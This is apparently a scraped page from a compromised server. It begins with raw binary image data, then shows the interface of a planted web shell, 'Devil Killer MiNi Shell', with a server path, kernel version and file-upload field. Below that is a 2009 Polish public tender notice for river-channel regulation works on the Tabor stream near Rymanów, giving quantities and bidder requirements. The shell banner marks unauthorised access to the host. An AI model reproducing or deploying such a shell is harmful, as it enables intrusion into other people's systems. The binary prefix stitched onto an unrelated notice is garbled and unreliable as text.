JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090909/151615-N-2009.html

<p class="kh_header"><b>Rzeszów: Regulacja koryta potoku Tabor w km 17+348 - 20+435 oraz remont koryta potoku w km 20+435 - 22+020 na łącznej długości 4,672 km w miejscowości Rymanów, Posada Górna, Rymanów Zdrój, gm. Rymanów, woj. podkarpackie</b><br>
<b>Numer ogłoszenia: 151615 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpacki Zarząd Melioracji i Urządzeń Wodnych , ul. Hetmańska 9, 35-959 Rzeszów, woj. podkarpackie, faks 017 8536421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzmiuw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka samorządowa jedn. org. nieposiadająca osobowości prawnej (jednostka budżetowa).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Regulacja koryta potoku Tabor w km 17+348 - 20+435 oraz remont koryta potoku w km 20+435 - 22+020 na łącznej długości 4,672 km w miejscowości Rymanów, Posada Górna, Rymanów Zdrój, gm. Rymanów, woj. podkarpackie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotowa inwestycja stanowi kontynuację robót wykonanych na potoku Tabor w km 17+348-20+435 w roku 2008 oraz pełny zakres planowanych robót remontowych na odcinku uregulowanym w km 20+435-22+020. 
Podstawowym założeniem odcinkowej regulacji koryta potoku w km 17+348-20+435 jest zabezpieczenie wyerodowanych brzegów opaskami z koszy siatkowo kamiennych na narzucie kamiennym, szczególnie na łukach wklęsłych oraz budowa dwóch stopni o wysokości H=2x0,40m, wykonanych z koszy siatkowo- kamiennych ułożonych na włókninie i budowa przejazdu w bród z płyt żelbetowych typu MON. 
Z uwagi na kamieniste dno niweleta jego nie będzie naruszana. W km 20+435-22+020 planowany jest remont koryta potoku i budowli wykonanych w latach 1968-71. Roboty te będą polegały na rozkuciu i odbudowie zniszczonych części murków oporowych zabezpieczających stopę skarpy i nadbudowie z betonu B-20 
z wzmocnieniem dwoma drutami poziomymi i pionowym co 50 cm z wierceniem otworów na głębokość 20 cm w istniejącej części murka w celu ich trwałego połączenia. Remont bruku z kamienia naturalnego na skarpach polega na usunięciu wykruszonych elementów i zastąpieniu nowymi na 15 cm podbudowie z betonu. Przy stopniach i zaporze przeciwrumowiskowej planowana jest likwidacja pęknięć  okładziny kamiennej i ubytku betonu na skrzydłach i przelewie polegająca na rozkuciu i zabetonowaniu tych miejsc z wykonaniem lica z okładziny kamiennej.

Załączony do siwz projekt architektoniczno-budowlany obejmuje całość robót, w tym również roboty wykonane w 2008 r. w km 17+348-20+435.

Pozostały do wykonania zakres robót obejmuje: 

a) Roboty przygotowawcze
W ramach robót przygotowawczych należy wykonać mechaniczne karczowanie pni w ilości 36 szt., wywiezienie karpiny na odległość do 2 km, oczyszczenie terenu z pozostałości po karczunku oraz mechaniczne plantowanie terenu po karczunku i jego obsiew.

b) Drogi  technologiczne i remont dróg dojazdowych
Z uwagi na rzadką i oddaloną od koryta zabudowę, drogi technologiczne należy wykonać po jednej stronie potoku. Na drugą stronę materiały budowlane będą podawane dźwigiem. Wszystkie drogi technologiczne muszą mieć połączenie z drogami utwardzonymi ogólnodostępnymi. 
Drogi te należy wykonać z płyt drogowych na istniejącym terenie z niewielkim jego przystosowaniem do układania płyt. Szerokość drogi 3,0m.
Po wykonaniu umocnień drogi technologiczne należy rozebrać, a zniszczone lokalne drogi dojazdowe wyremontować.

c) Roboty ziemne i umocnieniowe

1) Regulacja potoku Tabor
Dla uregulowanego odcinka potoku przyjęto następujące wymiary:
- szerokość dna 8,0m,
- spadki dna od 0,6 % do 25,8 %,
- nowo formowane skarpy nachylenie 1:1,5,
- ubezpieczenie stopy skarp na łukach:
wklęsłych, kosze siatkowo - kamienne 3 warstwy po 0,5 m,
wypukłych, kosze siatkowo - kamienne 1 warstwa 0,5 m,
- ubezpieczenie na odcinkach prostych kosze siatkowo - kamienne 1 lub 2 warstwowe,
- opaski z koszy siatkowo kamiennych ułożyć na narzucie z kamienia łamanego luzem o warstwie grubości 30 cm oraz na włókninie o gramaturze 400 g/m2,
- powyżej opaski skarpy umocnione zostaną koszami siatkowo kamiennymi o gr. 0,3 m ułożonymi na włókninie o gramaturze 400 g/m2 na  płask po skarpie.

2) Stopnie z koszy siatkowo - kamiennych w km 17+807 i w km 19+400.
Dla redukcji spadku dna i powstrzymania erozji dennej, zaprojektowano 3 stopnie z koszy siatkowo kamiennych, w tym dwa o wysokości H = 2 x 0,4 m są do wykonania w roku bieżącym a jeden o wysokości H = 0,4 m wykonano w roku ubiegłym Zaprojektowano wykonanie stopni z koszy siatkowo - kamiennych ułożonych na włókninie o gramaturze 400 g/m2 i opartych na ściance szczelnej z grodzic G-62. Wszystkie kosze w dnie należy wykonać z wyprawą z zaprawy cementowej M-7, natomiast opaski przy stopniu o długości 34 mb każda z koszy siatkowo kamiennych bez wyprawy.

3) Ubezpieczenie dna pod istniejącymi budowlami - kładka w km 18+780.
W projekcie przewidziano pod istniejącymi budowlanymi komunikacyjnymi jak kładki i mosty, umocnić dno i skarpy koszami siatkowo - kamiennymi układanymi na płask grubości 0,3 m i długości 10 m.

d) Budowa przejazdu w bród w km 18+770
Przewiduje się w miejscu dotychczasowego przejazdu w bród wykonanie nowego ułatwiającego komunikację pomiędzy obydwoma brzegami potoku. Przejazd zostanie wykonany z płyt drogowych o wym. 300 x 150 x 15 cm, ułożonych na podsypce żwirowej grubości 15 cm przykrytej włókniną o gramaturze 400 g/m2.
Szerokość brodu wynosi 3,0 m. Płyty od strony górnej wody należy zabezpieczyć koszami siatkowo - kamiennymi o wymiarach 1,0x2,5x0,30, ułożonymi pasem o  szerokość 2,0 m, natomiast od strony dolnej wody pasem 3,0m. 

e) Remont koryta i budowli w km 20+435 - 20+020
W ramach prac remontowych należy wykonać rozbiórkę zniszczonego murku oporowego, a następnie jego nadbudowę z betonu B20 wzmocnioną drutami ze stali, remont bruku na skarpach potoku polegający na usunięciu wykruszonych elementów i zastąpienie nowymi oraz remont stopni i zapory polegający na likwidacji pęknięć i wżerów na skrzydłach i przelewie przez ułożenie nowego betonu i połączeniu z istniejącym.

2. Zakres rzeczowy robót obejmuje:

1) Roboty przygotowawcze, w tym m.in.:
mechaniczne karczowanie pni                              		-	36 szt,
wywożenie karpiny na odległość do 2,0 km			-	40 mp,
oczyszczenie terenu po wykarczowaniu 			-      3 114 m2,
mechaniczne plantowanie terenu po karczunku  		-      1 367 m2,
obsiew skarp po karczunku 					-      1 800 m2,
roboty pomiarowa przy liniowych robotach ziemnych	-         470 mb,
2) Drogi technologiczne, w tym m.in.:
droga technologiczna z płyt żelbetowych (ułożenie i rozebranie) 2996 m2,
remont kostki brukowej betonowej o grubości 8 cm		-         100 m2,
-   remonty cząstkowe nawierzchni bitumicznych		-         500 m2,
3) Roboty ziemne i umocnieniowe, w tym m.in.:
a) regulacja potoku Tabor:
roboty ziemne                                                               -           640 m3,
plantowanie skarp i dna      			           -       1 984 m2,
mechaniczne rozplantowanie ziemi z odkładu 	           -          984 m3,
roboty ziemne z transportem na odległość do 2 km     -          149 m3,
ułożenie włókniny syntetycznej o gramaturze 400 g/m2 pod kosze w opaskach -      1 364 m2, 
wykonanie koszy siatkowo-kamiennych 3,0x1,0x0,5 m -      315,5m3, 
wykonanie koszy siatkowo-kamiennych 2,5x1,0x0,3 m-       193,8m3, 
rozbiórka konstrukcji żelbetowych z wywozem do 2 km-	  10m3,
wykonanie narzutu kamiennego w dnie 			 -	 264m3,
transport lądowy kamienia na odległość do 0,5 km	 -       1608,5t,
odmulenie rowu  0,8m3/mb				 -	 78 m,
ubezpieczenie rowu płytami YOMB 100x75x12        -                140,4 m2, 
zasypanie wnęk za ścianami budowli 		        -		    121 m3, 
b) stopnie siatkowo-kamienne:
rozbiórka konstrukcji żelbetowych 		        -		      81 m3,
roboty ziemne 					        -		 320,4 m3,
wbijanie ścianek szczelnych stalowych 6 m 	        -                    36 m,
wykonanie w dnie koszy siatkowo-kamiennych z wyprawą       369,4m3, 
wykonanie opasek z koszy siatkowo - kamiennych  -                232,2m3,
narzut kamienny w dnie				        -		        9 m3,
grodze drewniano-ziemne o wysokości 1,5m	        -	   	      40 m,
ułożenie włókniny o gramaturze 400 g/m2 pod kosze			        -   1057,6m2,
c) umocnienie dna pod istniejącymi budowlami: 
wykonanie koszy siatkowo-kamiennych 2,5x1,0x0,3 m -	     24 m3 
4) Budowa przejazdu w bród tym m.in.:
żwirowa podsypka filtracyjna pod płyty 			  -	   15,3 m2,
roboty ziemne 						  -	      52 m3,
wykonanie przejazdu 					  -	     102 m2,
wykonanie koszy siatkowo-kamiennych 2,5x1,0x0,3 m	  -	      12  m3,
ułożenie włókniny o gramaturze 400 g/m2 pod kosze i pod płyty			  -    142 m2,
5) Remont koryta i budowli w km 20+435 - 20+020, w tym m.in.:
roboty ziemne 						 -	   144,8 m3,
wykonanie murów okładzinowych przy stopniach		 -	     8,65 m3,
rozbiórka konstrukcji betonowych 				 -	    149,7m3,
roboty betonowe 						 -	      264 m2,
zbrojenie murków betonowych				 -	 1 886,6 kg,
podłoże betonowe pod bruk					 -	    217,2 m3,
rozbiórka umocnień skarp z bruku 				 -	    1 448 m2,
podsypka żwirowa pod bruk					 -	    1 448 m2,
wykonanie umocnień skarp z bruku 			 -	    1 448 m2,
transport lądowy na odl. do 0,5 km				 -	     637,1t,
spoinowanie bruków						 -             1 448 m2,
spoinowanie murów przy stopniach			 -                210m2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.24.00.00-1, 45.24.60.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 15 000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy: 
1) Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych 
2) Spełniają warunki zawarte w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.
3) Spełniają warunki i wymogi określone w specyfikacji istotnych warunków zamówienia i w ustawie Prawo Zamówień Publicznych, 
a w szczególności:
Wykonawca przystępujący do przetargu winien:
a) Zrealizować w okresie ostatnich 5 lat co najmniej: 
- 1 zamówienie o minimalnej wartości 1,6 mln zł brutto (w generalnym wykonawstwie), odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia,  albo 
- dwa lub więcej zamówień o minimalnej wartości każdego z nich 400 tys. zł brutto, których suma wartości wyniesie min. 1,6 mln zł brutto 
(w generalnym wykonawstwie), odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia. 
Zamówienia j.w. winny być poparte dokumentami potwierdzającymi, że zostały wykonane należycie np. referencje.
b) Wskazać do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby:
- Kierownika budowy 	- 1 osobę,
- Kierownika robót 	- 2 osoby.
W/w osoby winny legitymować się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności: inżynieria wodna lub wodno-melioracyjna lub konstrukcyjno-inżynieryjna w zakresie budowli hydrotechnicznych lub winny posiadać inne odpowiadające w/w tożsame uprawnienia wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień. 
Ponadto ww. osoby winny wykazać się przynależnością do właściwej izby samorządu zawodowego.
oraz:
- 1 osobę legitymującą się stosownymi uprawnieniami do kierowania robotami budowlanymi w specjalności drogowej.
Ww. osoba winna wykazać się przynależnością do właściwej izby samorządu zawodowego.
- 1 osobę posiadającą uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w następujących zakresach:
geodezyjne pomiary sytuacyjno - wysokościowe, realizacyjne i inwentaryzacyjne,
rozgraniczanie i podział nieruchomości gruntowych oraz sporządzanie dokumentacji zgodnie z wymogami prawnymi.
c) W przypadku złożenia oferty wspólnej przez dwóch lub więcej Wykonawców warunki określone w ppkt. a i b powinny być spełnione przez tego lub tych Wykonawców, którzy w imieniu wszystkich wykażą spełnienie w/w warunków.
4) Złożą ofertę wraz z wymaganymi dokumentami, załącznikami oraz oświadczeniami.
Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu: Ocena spełnienia warunków zostanie dokonana na podstawie załączonych do oferty oświadczeń i dokumentów określonych przez Zamawiającego w specyfikacji istotnych warunków zamówienia, wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta winna być sporządzona na lub w oparciu o Wzór formularza oferty (załącznik Nr 1 do specyfikacji) oraz zawierać niżej wymienione załączniki: 

Załącznik Nr 1 - Tabela elementów scalonych w/g podanego wzoru. Wykonawca winien podać dla każdego elementu tabeli cenę wyliczoną w oparciu o: - projekt architektoniczno-budowlany, - przedmiary robót, - specyfikację techniczną wykonania i odbioru robót, - warunki podane w specyfikacji istotnych warunków zamówienia, - dokonaną wizję lokalną. 

Załącznik Nr 2 - Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy z 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz.U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) oraz o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy. 

Załącznik Nr 3 - a/ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 
b/ Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych zgodnie z ppkt. a dokumentów wymaga się złożenia dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy. 

Załącznik Nr 4 - Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

Załącznik Nr 5 - Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 

Załącznik Nr 6 - Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych wystawiona nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 

Załącznik Nr 7 - Wykaz wykonanych robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia z okresu ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wg podanego wzoru: Doświadczenie w zakresie wykonawstwa. 
UWAGA: Za roboty odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia uważane będą roboty polegające na regulacji, modernizacji koryt rzek i potoków oraz budowie, przebudowie, modernizacji obwałowań i śluz wałowych. 

Załącznik Nr 8 - Dokumenty potwierdzające, że roboty, o których mowa w załączniku nr 7 zostały wykonane należycie np. referencje od Zamawiających. 

Załącznik Nr 9 - Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wg podanego wzoru: Kwalifikacje techniczne. Jeżeli w wykazie j.w. Wykonawca wskazał osoby, którymi będzie dysponował wówczas winien załączyć do oferty pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - stosownie do § 1 ust. 2 pkt. 5a rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 87, poz. 605 z późn. zm.). 

Załącznik Nr 10 - a) Kserokopie uprawnień osób wskazanych w zał. nr 9 b) Kserokopia zaświadczenia o wpisie osób wskazanych w zał. Nr 9 na listę członków właściwej izby samorządu zawodowego (ustawa z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. nr 5, poz. 42 z późn. zm.). 
Uwaga do załącznika Nr 9 i Nr 10: 
Wykonawca wskaże w zał. Nr 9 do uczestnictwa w wykonaniu niniejszego zamówienia następujące osoby: 
a) Kierownika budowy - 1 osobę, 
b) Kierownika robót - 2 osoby. 
W/w osoby winny legitymować się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności: inżynieria wodna lub wodno-melioracyjna lub konstrukcyjno-inżynieryjna w zakresie budowli hydrotechnicznych lub winny posiadać inne odpowiadające w/w tożsame uprawnienia wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień. 
Ponadto ww. osoby winny wykazać się przynależnością do właściwej izby samorządu zawodowego. oraz: 
c) 1 osobę legitymującą się stosownymi uprawnieniami do kierowania robotami budowlanymi w specjalności drogowej.
	Ww. osoba winna wykazać się przynależnością do właściwej izby samorządu zawodowego.
d) 1 osobę posiadającą uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w następujących zakresach: 
- geodezyjne pomiary sytuacyjno - wysokościowe, realizacyjne i inwentaryzacyjne, 
- rozgraniczanie i podział nieruchomości gruntowych oraz sporządzanie dokumentacji zgodnie z wymogami prawnymi. 

Załącznik Nr 11 - Dowód wniesienia wadium. 

Załącznik Nr 12 - Pełnomocnictwo stosownie do postanowień zawartych w art. 23 ust. 2 ustawy Prawo zamówień publicznych. 

Załącznik Nr 13 - Wykaz dokumentów zastrzeżonych, jako tajne. Objęte wykazem dokumenty, stanowiące tajemnicę przedsiębiorstwa Wykonawca zamieści w oddzielnej kopercie. Brak załącznika oznaczać będzie, że wszystkie złożone przez Wykonawcę dokumenty są jawne i mogą być udostępniane innym uczestnikom postępowania. 

2. Stosownie do art. 8 ust. 3 ustawy Prawo zamówień publicznych Wykonawca może zastrzec nie później niż w terminie składania ofert, które ze złożonych informacji stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji i nie mogą być udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy j.w. 

3.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 1. załącznik Nr 3, Nr 4, Nr 5 i Nr 6 składa: 
1) Załącznik Nr 3, Nr 4, Nr 6 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że: 
a) Nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b) Nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
c) Nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
2) Załącznik Nr 5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy. 
3.2. Dokumenty, o których mowa w pkt. 3.1 ppkt. 1a, c oraz ppkt. 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 3.1 ppkt 1b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3.3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 3.1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. W takim przypadku terminy, o których mowa w pkt 3.2. stosuje się odpowiednio. 

4.Wymagania ogólne dotyczące sporządzenia oferty: 
1) Wykonawcy powinni przedstawić oferty zgodne z wymaganiami specyfikacji istotnych warunków zamówienia. Oferta winna zawierać wszystkie wymagane dokumenty, oświadczenia, załączniki i należy ją sporządzić na lub w oparciu o Formularz oferty. Wykonawców obowiązuje wykorzystanie załączonych wzorów załączników. Wszystkie pola i pozycje tych wzorów winny być wypełnione. 
2) Dokumenty, o których mowa w ppkt 4.1 mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez uprawnionych przedstawicieli Wykonawcy. 
3) Ofertę składa się w formie pisemnej. 
4) Zamawiający nie wyraża zgody na złożenie ofert w postaci elektronicznej. 
5) Oferta powinna być napisana w języku polskim, trwałą i czytelną techniką (np. na maszynie do pisania, komputerze, długopisem) w 1 egzemplarzu. Wszystkie dokumenty w języku obcym należy załączyć wraz z ich tłumaczeniem na język polski, sporządzonym przez osobę uprawnioną (biegłego tłumacza), potwierdzonym przez Wykonawcę. 
6) Oferta, załączniki, oświadczenia muszą być podpisane przez osobę (osoby) uprawnione do reprezentowania Wykonawcy. Jeżeli zasady reprezentacji nie wynikają z przedłożonych dokumentów wymaga się złożenie dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy. 
7) Wszystkie miejsca, w których Wykonawca naniósł zmiany powinny być parafowane przez osobę podpisującą ofertę. Ewentualne zmiany powinny być naniesione czytelnie. 
8) Wykonawcy ponoszą wszystkie koszty związane ze sporządzeniem i złożeniem oferty niezależnie od wyniku postępowania przetargowego. 
9) Wykonawca może złożyć jedną ofertę. 
10) Wykonawca winien zgromadzić wszelkie informacje, które mogą być konieczne do przygotowania oferty na własny koszt. Wszystkie koszty związane z przeprowadzeniem wizji lokalnej ponosi samodzielnie każdy Wykonawca. 

